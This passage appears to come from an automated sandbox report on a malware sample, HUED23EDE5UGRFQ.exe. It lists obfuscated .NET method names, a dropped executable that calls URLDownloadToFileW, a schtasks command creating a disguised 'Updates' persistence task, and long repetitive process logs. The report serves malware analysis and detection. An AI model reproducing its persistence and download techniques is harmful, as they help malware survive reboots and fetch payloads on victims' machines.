                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, yxkao7hiFSsCxJrj6x.csHigh entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, VrKmqeMx6E5LwgMLC4.csHigh entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, IAZmwL4UXY1NmAmY0w.csHigh entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, EdXujie0QO3KCWsV9Qe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, hlyFOV3NjigwVy9fWY.csHigh entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, IhhE4IzvotpcF7E1nA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, omVVIsy4JEq4JnFNAX.csHigh entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, LSEQgSWw6PFKkwBvUW.csHigh entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, C5Fi006NlErAQ6vXTa.csHigh entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, n026WbD77LwpII4skq.csHigh entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, QUsUCJZYbbjkgd53fi.csHigh entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, KevtKNusq8g1AfXZ5c.csHigh entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.csHigh entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, O7QaxOP1WHfuKiysCB.csHigh entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, UsNrrbl72Ir1JF4Inh.csHigh entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ULLvmxT725yvDGgCf2.csHigh entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, DSSwTQO1NWXixqGlCL.csHigh entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, oT9uaNmRpGhyBXALGV.csHigh entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, x2AqPHq2qhLej4XYqg.csHigh entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, flsNFv1jqRn4UFfbYv.csHigh entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, qVbjiYeg51FIPLgDide.csHigh entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, yxkao7hiFSsCxJrj6x.csHigh entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,17_2_00406EB0
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile created: C:\Users\user\AppData\Roaming\jdSldfVS.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
